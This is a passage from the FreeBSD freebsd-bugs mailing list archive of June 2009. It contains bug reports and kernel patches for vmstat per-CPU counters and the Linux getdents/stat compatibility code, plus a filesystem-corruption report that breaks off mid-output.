my own kernel in 7.2 Release. I found a when bug in psparse.c file ! The line 528 in psparse.c (/usr/src/sys/contrib/dev/acpica) The "[" should be ";" From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 15:36:57 2009 Return-Path: Delivered-To: freebsd-bugs@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 1112A106566C for ; Sun, 21 Jun 2009 15:36:57 +0000 (UTC) (envelope-from sofax@airgo.tw) Received: from ms1.airgo.tw (ms1.airgo.com.tw [59.124.213.144]) by mx1.freebsd.org (Postfix) with ESMTP id A18558FC1B for ; Sun, 21 Jun 2009 15:36:56 +0000 (UTC) (envelope-from sofax@airgo.tw) Received: from GameXP (122-116-46-38.HINET-IP.hinet.net [122.116.46.38]) (authenticated bits=0) by ms1.airgo.tw (8.12.9/8.12.9) with ESMTP id n5LFF9Ls008153 for ; Sun, 21 Jun 2009 23:15:15 +0800 (CST) From: "Sofax Chen" To: Date: Sun, 21 Jun 2009 23:14:59 +0800 Organization: AirGo Message-ID: <4D997319317744A89D00D13F61F654BB@GameXP> MIME-Version: 1.0 X-Mailer: Microsoft Office Outlook 11 Thread-Index: Acnygwq/885nggYNTFSUHPg8TohOTg== X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579 X-Mailman-Approved-At: Sun, 21 Jun 2009 16:31:16 +0000 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Cc: Subject: Build a my kernel ! X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: sofax@airgo.tw List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 15:36:57 -0000 Dear Sir: When I try to build a my own kernel in 7.2 Release. I found a when bug in psparse.c file ! The line 528 in psparse.c (/usr/src/sys/contrib/dev/acpica) The "[" should be ";" From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 15:36:57 2009 Return-Path: Delivered-To: freebsd-bugs@FreeBSD.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id E7C9F1065673 for ; Sun, 21 Jun 2009 15:36:57 +0000 (UTC) (envelope-from sofax@airgo.tw) Received: from ms1.airgo.tw (ms1.airgo.com.tw [59.124.213.144]) by mx1.freebsd.org (Postfix) with ESMTP id 86F218FC08 for ; Sun, 21 Jun 2009 15:36:57 +0000 (UTC) (envelope-from sofax@airgo.tw) Received: from GameXP (122-116-46-38.HINET-IP.hinet.net [122.116.46.38]) (authenticated bits=0) by ms1.airgo.tw (8.12.9/8.12.9) with ESMTP id n5LFFHLs008154 for ; Sun, 21 Jun 2009 23:15:24 +0800 (CST) From: "Sofax Chen" To: Date: Sun, 21 Jun 2009 23:15:07 +0800 Organization: AirGo Message-ID: <09C46803339F49ACBAB755FDDD86F9DD@GameXP> MIME-Version: 1.0 X-Mailer: Microsoft Office Outlook 11 Thread-Index: Acnygwq/885nggYNTFSUHPg8TohOTg== X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579 X-Mailman-Approved-At: Sun, 21 Jun 2009 16:31:41 +0000 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Content-Filtered-By: Mailman/MimeDel 2.1.5 Cc: Subject: Build a my kernel ! X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: sofax@airgo.tw List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 15:36:58 -0000 Dear Sir: When I try to build a my own kernel in 7.2 Release. I found a when bug in psparse.c file ! The line 528 in psparse.c (/usr/src/sys/contrib/dev/acpica) The "[" should be ";" From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 18:40:01 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 59AF31065672 for ; Sun, 21 Jun 2009 18:40:01 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 34C738FC1A for ; Sun, 21 Jun 2009 18:40:01 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5LIe1sj015277 for ; Sun, 21 Jun 2009 18:40:01 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5LIe1fX015276; Sun, 21 Jun 2009 18:40:01 GMT (envelope-from gnats) Resent-Date: Sun, 21 Jun 2009 18:40:01 GMT Resent-Message-Id: <200906211840.n5LIe1fX015276@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Mikolaj Golub Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 539DA106566C for ; Sun, 21 Jun 2009 18:39:28 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id 41B668FC0C for ; Sun, 21 Jun 2009 18:39:28 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5LIdRtn020055 for ; Sun, 21 Jun 2009 18:39:27 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.3/8.14.3/Submit) id n5LIdR5W020047; Sun, 21 Jun 2009 18:39:27 GMT (envelope-from nobody) Message-Id: <200906211839.n5LIdR5W020047@www.freebsd.org> Date: Sun, 21 Jun 2009 18:39:27 GMT From: Mikolaj Golub To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: bin/135893: 'vmstat -s -M core' is broken X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 18:40:01 -0000 >Number: 135893 >Category: bin >Synopsis: 'vmstat -s -M core' is broken >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Jun 21 18:40:00 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Mikolaj Golub >Release: >Organization: >Environment: FreeBSD fbsd.zhuzha.ua1 8.0-CURRENT FreeBSD 8.0-CURRENT #0 r193993M: Thu Jun 11 17:01:46 EEST 2009 root@zhuzha.ua1:/home/golub/freebsd/build/obj/home/golub/freebsd/src/sys/GENERIC i386 FreeBSD zhuzha.ua1 7.2-STABLE FreeBSD 7.2-STABLE #18: Wed Jun 3 14:28:49 EEST 2009 root@zhuzha.ua1:/usr/obj/usr/src/sys/DEBUG i386 >Description: 'vmstat -s -M core' is broken, printing 0 for most of the counters. This is because vmstat looks for statistics only in global `cnt' while the values of most of the counters are collected now in per-CPU variables. >How-To-Repeat: vmstat -s -M /dev/mem -N /boot/kernel/kernel and compare with output of vmstat -s >Fix: Attached patch fixes this. Patch attached with submission follows: --- usr.bin/vmstat/vmstat.c.orig 2009-02-22 04:11:24.000000000 +0200 +++ usr.bin/vmstat/vmstat.c 2009-06-21 20:51:20.000000000 +0300 @@ -58,6 +58,7 @@ #include #include #include +#include #include @@ -418,10 +419,93 @@ } static void +fill_pcpu(struct pcpu ***p, int* maxcpup) { + struct pcpu **pp; + + int maxcpu, size, i; + + *p = NULL; + + if (kd == NULL) + return; + + maxcpu = kvm_getmaxcpu(kd); + if(maxcpu < 0) + errx(1, "kvm_getcptime: %s", kvm_geterr(kd)); + if(maxcpu == 0) /* XXX: not sure this check makes sence */ + return; + + size = sizeof(struct pcpu *) * maxcpu; + pp = (struct pcpu **)calloc(1, size); + if(pp == NULL) + err(1, "malloc %zd bytes", size); + + for(i = 0; i < maxcpu; i++) { + pp[i] = kvm_getpcpu(kd, i); + if(pp[i] == (struct pcpu *)-1) + errx(1, "kvm_getpcpu: %s", kvm_geterr(kd)); + } + + *maxcpup = maxcpu; + *p = pp; + return; +} + +static void +free_pcpu(struct pcpu **p, int maxcpu) { + int i; + for(i = 0; i < maxcpu; i++) + free(p[i]); + free(p); + p = NULL; +} + +static void fill_vmmeter(struct vmmeter *vmmp) { if (kd != NULL) { + struct pcpu **ppcpup; + int maxcpu, i; + kread(X_SUM, vmmp, sizeof(*vmmp)); + + fill_pcpu(&ppcpup, &maxcpu); + for(i=0; i < maxcpu; i++) { + if(ppcpup[i] == NULL) + continue; +#define ADD_FROM_PCPU(i, name) \ + vmmp->name += ppcpup[i]->pc_cnt.name + ADD_FROM_PCPU(i, v_swtch); + ADD_FROM_PCPU(i, v_trap); + ADD_FROM_PCPU(i, v_syscall); + ADD_FROM_PCPU(i, v_intr); + ADD_FROM_PCPU(i, v_soft); + ADD_FROM_PCPU(i, v_vm_faults); + ADD_FROM_PCPU(i, v_cow_faults); + ADD_FROM_PCPU(i, v_cow_optim); + ADD_FROM_PCPU(i, v_zfod); + ADD_FROM_PCPU(i, v_ozfod); + ADD_FROM_PCPU(i, v_swapin); + ADD_FROM_PCPU(i, v_swapout); + ADD_FROM_PCPU(i, v_swappgsin); + ADD_FROM_PCPU(i, v_swappgsout); + ADD_FROM_PCPU(i, v_vnodein); + ADD_FROM_PCPU(i, v_vnodeout); + ADD_FROM_PCPU(i, v_vnodepgsin); + ADD_FROM_PCPU(i, v_vnodepgsout); + ADD_FROM_PCPU(i, v_intrans); + ADD_FROM_PCPU(i, v_tfree); + ADD_FROM_PCPU(i, v_forks); + ADD_FROM_PCPU(i, v_vforks); + ADD_FROM_PCPU(i, v_rforks); + ADD_FROM_PCPU(i, v_kthreads); + ADD_FROM_PCPU(i, v_forkpages); + ADD_FROM_PCPU(i, v_vforkpages); + ADD_FROM_PCPU(i, v_rforkpages); + ADD_FROM_PCPU(i, v_kthreadpages); +#undef ADD_FROM_PCPU + } + free_pcpu(ppcpup, maxcpu); } else { size_t size = sizeof(unsigned int); #define GET_VM_STATS(cat, name) \ >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 19:08:46 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 5DC2E1065675; Sun, 21 Jun 2009 19:08:46 +0000 (UTC) (envelope-from dchagin@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 316868FC16; Sun, 21 Jun 2009 19:08:46 +0000 (UTC) (envelope-from dchagin@FreeBSD.org) Received: from freefall.freebsd.org (dchagin@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5LJ8knb037782; Sun, 21 Jun 2009 19:08:46 GMT (envelope-from dchagin@freefall.freebsd.org) Received: (from dchagin@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5LJ8j5D037778; Sun, 21 Jun 2009 19:08:45 GMT (envelope-from dchagin) Date: Sun, 21 Jun 2009 19:08:45 GMT Message-Id: <200906211908.n5LJ8j5D037778@freefall.freebsd.org> To: kheuer2@gwdg.de, dchagin@FreeBSD.org, freebsd-bugs@FreeBSD.org From: dchagin@FreeBSD.org Cc: Subject: Re: kern/113939: [named-pipes] Linux (e.g.) ls hangs on named pipes in 6.2-RELEASE [regression] X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 19:08:46 -0000 Synopsis: [named-pipes] Linux (e.g.) ls hangs on named pipes in 6.2-RELEASE [regression] State-Changed-From-To: open->closed State-Changed-By: dchagin State-Changed-When: Sun Jun 21 19:06:30 UTC 2009 State-Changed-Why: MFC to stable/7 done. http://www.freebsd.org/cgi/query-pr.cgi?pr=113939 From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 19:10:05 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id D0ECC106564A for ; Sun, 21 Jun 2009 19:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id BDB708FC15 for ; Sun, 21 Jun 2009 19:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5LJA3qj037893 for ; Sun, 21 Jun 2009 19:10:03 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5LJA3Wb037892; Sun, 21 Jun 2009 19:10:03 GMT (envelope-from gnats) Date: Sun, 21 Jun 2009 19:10:03 GMT Message-Id: <200906211910.n5LJA3Wb037892@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: dfilter@FreeBSD.ORG (dfilter service) Cc: Subject: Re: kern/113939: commit references a PR X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: dfilter service List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 19:10:06 -0000 The following reply was made to PR kern/113939; it has been noted by GNATS. From: dfilter@FreeBSD.ORG (dfilter service) To: bug-followup@FreeBSD.org Cc: Subject: Re: kern/113939: commit references a PR Date: Sun, 21 Jun 2009 19:02:43 +0000 (UTC) Author: dchagin Date: Sun Jun 21 19:02:32 2009 New Revision: 194599 URL: http://svn.freebsd.org/changeset/base/194599 Log: MFC r164890 (by jkim): Fixes for 'blocking in fifoor state' problem of LTP tests. linux_*stat*() functions were opening files with O_RDONLY to get major/minor pair for char/block special files. Unfortunately, when these functions are used against fifo, it is blocked forever because there is no writer. Instead, we only open char/block special files for major/minor conversion. We have to get rid of kern_open() entirely from translate_path_major_minor() but today is not the day. While I am here, add checks for errors before calling translate_path_major_minor(). MFC r179651: d_ino member of linux_dirent structure should be unsigned long. MFC r182892: Getdents requires padding with 2 bytes instead of 1 byte as with getdents64. The last byte is used for storing the d_type, add this to plain getdents case where it was missing before. Also change the code to use strlcpy instead of plain strcpy. MFC r188572: Fix an edge-case of the linux readdir: We need the size of a linux dirent structure, not the size of a pointer to it. PR: kern/113939 Approved by: kib (mentor) Modified: stable/6/sys/ (props changed) stable/6/sys/compat/linux/linux_file.c stable/6/sys/compat/linux/linux_stats.c stable/6/sys/contrib/pf/ (props changed) stable/6/sys/dev/cxgb/ (props changed) Modified: stable/6/sys/compat/linux/linux_file.c ============================================================================== --- stable/6/sys/compat/linux/linux_file.c Sun Jun 21 17:35:04 2009 (r194598) +++ stable/6/sys/compat/linux/linux_file.c Sun Jun 21 19:02:32 2009 (r194599) @@ -232,7 +232,7 @@ linux_readdir(struct thread *td, struct */ struct l_dirent { - l_long d_ino; + l_ulong d_ino; l_off_t d_off; l_ushort d_reclen; char d_name[LINUX_NAME_MAX + 1]; @@ -246,9 +246,20 @@ struct l_dirent64 { char d_name[LINUX_NAME_MAX + 1]; }; -#define LINUX_RECLEN(de,namlen) \ - ALIGN((((char *)&(de)->d_name - (char *)de) + (namlen) + 1)) +/* + * Linux uses the last byte in the dirent buffer to store d_type, + * at least glibc-2.7 requires it. That is why l_dirent is padded with 2 bytes. + */ +#define LINUX_RECLEN(namlen) \ + roundup((offsetof(struct l_dirent, d_name) + (namlen) + 2), \ + sizeof(l_ulong)) + +#define LINUX_RECLEN64(namlen) \ + roundup((offsetof(struct l_dirent64, d_name) + (namlen) + 1), \ + sizeof(uint64_t)) +#define LINUX_MAXRECLEN max(LINUX_RECLEN(LINUX_NAME_MAX), \ + LINUX_RECLEN64(LINUX_NAME_MAX)) #define LINUX_DIRBLKSIZ 512 static int @@ -261,12 +272,13 @@ getdents_common(struct thread *td, struc int len, reclen; /* BSD-format */ caddr_t outp; /* Linux-format */ int resid, linuxreclen=0; /* Linux-format */ + caddr_t lbuf; /* Linux-format */ struct file *fp; struct uio auio; struct iovec aiov; off_t off; - struct l_dirent linux_dirent; - struct l_dirent64 linux_dirent64; + struct l_dirent *linux_dirent; + struct l_dirent64 *linux_dirent64; int buflen, error, eofflag, nbytes, justone; u_long *cookies = NULL, *cookiep; int ncookies, vfslocked; @@ -276,7 +288,7 @@ getdents_common(struct thread *td, struc /* readdir(2) case. Always struct dirent. */ if (is64bit) return (EINVAL); - nbytes = sizeof(linux_dirent); + nbytes = sizeof(*linux_dirent); justone = 1; } else justone = 0; @@ -302,6 +314,7 @@ getdents_common(struct thread *td, struc buflen = max(LINUX_DIRBLKSIZ, nbytes); buflen = min(buflen, MAXBSIZE); buf = malloc(buflen, M_TEMP, M_WAITOK); + lbuf = malloc(LINUX_MAXRECLEN, M_TEMP, M_WAITOK | M_ZERO); vn_lock(vp, LK_EXCLUSIVE | LK_RETRY, td); again: @@ -379,8 +392,8 @@ again: } linuxreclen = (is64bit) - ? LINUX_RECLEN(&linux_dirent64, bdp->d_namlen) - : LINUX_RECLEN(&linux_dirent, bdp->d_namlen); + ? LINUX_RECLEN64(bdp->d_namlen) + : LINUX_RECLEN(bdp->d_namlen); if (reclen > len || resid < linuxreclen) { outp++; @@ -389,34 +402,41 @@ again: if (justone) { /* readdir(2) case. */ - linux_dirent.d_ino = (l_long)bdp->d_fileno; - linux_dirent.d_off = (l_off_t)linuxreclen; - linux_dirent.d_reclen = (l_ushort)bdp->d_namlen; - strcpy(linux_dirent.d_name, bdp->d_name); - error = copyout(&linux_dirent, outp, linuxreclen); - } else { - if (is64bit) { - linux_dirent64.d_ino = bdp->d_fileno; - linux_dirent64.d_off = (cookiep) - ? (l_off_t)*cookiep - : (l_off_t)(off + reclen); - linux_dirent64.d_reclen = - (l_ushort)linuxreclen; - linux_dirent64.d_type = bdp->d_type; - strcpy(linux_dirent64.d_name, bdp->d_name); - error = copyout(&linux_dirent64, outp, - linuxreclen); - } else { - linux_dirent.d_ino = bdp->d_fileno; - linux_dirent.d_off = (cookiep) - ? (l_off_t)*cookiep - : (l_off_t)(off + reclen); - linux_dirent.d_reclen = (l_ushort)linuxreclen; - strcpy(linux_dirent.d_name, bdp->d_name); - error = copyout(&linux_dirent, outp, - linuxreclen); - } + linux_dirent = (struct l_dirent*)lbuf; + linux_dirent->d_ino = bdp->d_fileno; + linux_dirent->d_off = (l_off_t)linuxreclen; + linux_dirent->d_reclen = (l_ushort)bdp->d_namlen; + strlcpy(linux_dirent->d_name, bdp->d_name, + linuxreclen - offsetof(struct l_dirent, d_name)); + error = copyout(linux_dirent, outp, linuxreclen); } + if (is64bit) { + linux_dirent64 = (struct l_dirent64*)lbuf; + linux_dirent64->d_ino = bdp->d_fileno; + linux_dirent64->d_off = (cookiep) + ? (l_off_t)*cookiep + : (l_off_t)(off + reclen); + linux_dirent64->d_reclen = (l_ushort)linuxreclen; + linux_dirent64->d_type = bdp->d_type; + strlcpy(linux_dirent64->d_name, bdp->d_name, + linuxreclen - offsetof(struct l_dirent64, d_name)); + error = copyout(linux_dirent64, outp, linuxreclen); + } else if (!justone) { + linux_dirent = (struct l_dirent*)lbuf; + linux_dirent->d_ino = bdp->d_fileno; + linux_dirent->d_off = (cookiep) + ? (l_off_t)*cookiep + : (l_off_t)(off + reclen); + linux_dirent->d_reclen = (l_ushort)linuxreclen; + /* + * Copy d_type to last byte of l_dirent buffer + */ + lbuf[linuxreclen-1] = bdp->d_type; + strlcpy(linux_dirent->d_name, bdp->d_name, + linuxreclen - offsetof(struct l_dirent, d_name)-1); + error = copyout(linux_dirent, outp, linuxreclen); + } + if (error) goto out; @@ -452,6 +472,7 @@ out: VFS_UNLOCK_GIANT(vfslocked); fdrop(fp, td); free(buf, M_TEMP); + free(lbuf, M_TEMP); return (error); } Modified: stable/6/sys/compat/linux/linux_stats.c ============================================================================== --- stable/6/sys/compat/linux/linux_stats.c Sun Jun 21 17:35:04 2009 (r194598) +++ stable/6/sys/compat/linux/linux_stats.c Sun Jun 21 19:02:32 2009 (r194599) @@ -99,23 +99,16 @@ static void translate_fd_major_minor(struct thread *td, int fd, struct stat *buf) { struct file *fp; - int error; int major, minor; - if ((error = fget(td, fd, &fp)) != 0) + if ((!S_ISCHR(buf->st_mode) && !S_ISBLK(buf->st_mode)) || + fget(td, fd, &fp) != 0) return; - if (fp->f_vnode) { - if (fp->f_vnode->v_type == VCHR - || fp->f_vnode->v_type == VBLK) { - if (fp->f_vnode->v_un.vu_cdev) { - if (linux_driver_get_major_minor( - fp->f_vnode->v_un.vu_cdev->si_name, - &major, &minor) == 0) { - buf->st_rdev = (major << 8 | minor); - } - } - } - } + if (fp->f_vnode != NULL && + fp->f_vnode->v_un.vu_cdev != NULL && + linux_driver_get_major_minor(fp->f_vnode->v_un.vu_cdev->si_name, + &major, &minor) == 0) + buf->st_rdev = (major << 8 | minor); fdrop(fp, td); } @@ -128,6 +121,8 @@ translate_path_major_minor(struct thread int fd; int temp; + if (!S_ISCHR(buf->st_mode) && !S_ISBLK(buf->st_mode)) + return; temp = td->td_retval[0]; if (kern_open(td, path, UIO_SYSSPACE, O_RDONLY, 0) != 0) return; @@ -178,18 +173,19 @@ linux_newstat(struct thread *td, struct #endif error = kern_stat(td, path, UIO_SYSSPACE, &buf); - if (!error && strlen(path) > strlen("/dev/pts/") && - !strncmp(path, "/dev/pts/", strlen("/dev/pts/")) - && path[9] >= '0' && path[9] <= '9') { - /* - * Linux checks major and minors of the slave device to make - * sure it's a pty device, so let's make him believe it is. - */ - buf.st_rdev = (136 << 8); - } - - translate_path_major_minor(td, path, &buf); - + if (!error) { + if (strlen(path) > strlen("/dev/pts/") && + !strncmp(path, "/dev/pts/", strlen("/dev/pts/")) && + path[9] >= '0' && path[9] <= '9') { + /* + * Linux checks major and minors of the slave device + * to make sure it's a pty device, so let's make him + * believe it is. + */ + buf.st_rdev = (136 << 8); + } else + translate_path_major_minor(td, path, &buf); + } LFREEPATH(path); if (error) return (error); _______________________________________________ svn-src-all@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/svn-src-all To unsubscribe, send any mail to "svn-src-all-unsubscribe@freebsd.org" From owner-freebsd-bugs@FreeBSD.ORG Sun Jun 21 21:40:04 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 2B8FD1065676 for ; Sun, 21 Jun 2009 21:40:04 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 060C88FC0C for ; Sun, 21 Jun 2009 21:40:04 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5LLe3HQ055604 for ; Sun, 21 Jun 2009 21:40:03 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5LLe3j5055603; Sun, 21 Jun 2009 21:40:03 GMT (envelope-from gnats) Resent-Date: Sun, 21 Jun 2009 21:40:03 GMT Resent-Message-Id: <200906212140.n5LLe3j5055603@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Joe Greco Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id A1AD01065673 for ; Sun, 21 Jun 2009 21:32:00 +0000 (UTC) (envelope-from jgreco@aurora.sol.net) Received: from mail2.sol.net (mail2.sol.net [206.55.64.73]) by mx1.freebsd.org (Postfix) with ESMTP id 65D168FC1F for ; Sun, 21 Jun 2009 21:32:00 +0000 (UTC) (envelope-from jgreco@aurora.sol.net) Received: from aurora.sol.net (aurora.sol.net [206.55.65.130]) by mail2.sol.net (8.14.1/8.14.1/SNNS-1.04) with ESMTP id n5LKbHUv067810 for ; Sun, 21 Jun 2009 15:37:18 -0500 (CDT) Received: (from jgreco@localhost) by aurora.sol.net (8.12.8p1/8.12.9/Submit) id n5LKbWmt038127; Sun, 21 Jun 2009 15:37:32 -0500 (CDT) Message-Id: <200906212037.n5LKbWmt038127@aurora.sol.net> Date: Sun, 21 Jun 2009 15:37:32 -0500 (CDT) From: Joe Greco To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Cc: Subject: kern/135898: Severe filesystem corruption - large files or large filesystems X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Joe Greco List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Sun, 21 Jun 2009 21:40:04 -0000 >Number: 135898 >Category: kern >Synopsis: Severe filesystem corruption - large files or large filesystems >Confidential: no >Severity: serious >Priority: high >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Sun Jun 21 21:40:03 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Joe Greco >Release: FreeBSD 6-7, i386/amd64, etc (incompatibilities) >Organization: sol.net Network Services >Environment: Thie is a follow-on to a problem previously described on freebsd-hackers which was dismissed as a "controller corruption." We had noticed odd behaviour on a 1.5TB filesystem with a large file when moved from i386 to amd64. A ~400GB compressed dump refused to read when attached to an 7.*R/amd64 box. It was suggested that the dodgy SATA ctlr used to write the data was at fault, a theory put forth on hackers despite the fact that the data read fine on various amd64 and i386 boxes that had a good SATA ctlr, and it wasn't clear how that could be possible. Now that the filesystem restore is done, we acquired a second 1.5TB disk and we've got some more experimental results. Steps taken: 1) Place a Seagate 1.5TB SATA disk on a 3Ware 9550SX on a 6.1R/amd64 box. Create full disk filesystem. Mount, etc. # dd if=/dev/random of=file bs=1048576 count=500000 # cat genmds #! /bin/sh - uname -rp ( echo "count 1 " `dd if=file bs=1048576 count=1 | md5` echo "count 4 " `dd if=file bs=1048576 count=4 | md5` echo "count 16 " `dd if=file bs=1048576 count=16 | md5` echo "count 256 " `dd if=file bs=1048576 count=256 | md5` echo "count 1024 " `dd if=file bs=1048576 count=1024 | md5` ) 2> /dev/null # sh genmds 6.1-RELEASE amd64 count 1 a78d2f52290367c76837fb00a16a4e79 count 4 ba4e51e332a27ff8e5c817b4a95501d5 count 16 af3cd4e9a10cb5679a50081cdb35d54f count 256 56cc987930c0c9e8246c8f91ed9f23bb count 1024 4bc8e00d9c20210bd5cc0ccfbd7bb1a3 Gives us a baseline for comparison. 2) Unmount. Move to 7.0R/amd64 box. # sh genmds 7.0-RELEASE amd64 count 1 88f830ae7f572282a2da19ffb3d036e4 count 4 6b38b2c18f039859b10d8d33ffcc19c9 count 16 2d40cb233ef4be44a3c33edc79c3aa05 count 256 4fd629256316643099ddfdfd40afe56c count 1024 8ea0fa80158105d5b6f1768de5ceddc6 More terrifyingly, when repeated, some answers *change*: # sh genmds 7.0-RELEASE amd64 count 1 d7c43b568d8f72ecbd47d2dc89062704 count 4 e670a01847d4fe08958754ea434fbf6d count 16 c0c962024713c3db3e8d5070f7284413 count 256 830e32f1b862c7b867ccaf05782ff769 count 1024 8ea0fa80158105d5b6f1768de5ceddc6 It's not even consistent. 3) Unmount. Move to 7.2R/i386 box. # sh genmds 7.2-RELEASE i386 count 1 a78d2f52290367c76837fb00a16a4e79 count 4 ba4e51e332a27ff8e5c817b4a95501d5 count 16 af3cd4e9a10cb5679a50081cdb35d54f count 256 56cc987930c0c9e8246c8f91ed9f23bb count 1024 4bc8e00d9c20210bd5cc0ccfbd7bb1a3 Lookin' good. So. Experiment further. Place a Deskstar 250GB SATA on the 6.1R/amd64, write file. 4) basically same as 1), abbreviated for clarity # cat 61r-amd64 ; sh genmds 6.1-RELEASE amd64 count 1 65827a57009f618b3638f557246f40d8 count 4 b3f5e9743173c29211545ff42f6df15d count 16 1b6a9d862522bf1091a47f91b874470c count 256 64545fa4dc6af95519dfd6644639518f count 1024 3ed6942e979a794eaa3acdd2908543f4 7.0-RELEASE amd64 count 1 65827a57009f618b3638f557246f40d8 count 4 b537d1a50c85ee2e49cddb74a0afa9d0 count 16 5632bd5c03008dd89ea332f19aa8240c count 256 980bb1ba249fcff0136867bb8b461a3c count 1024 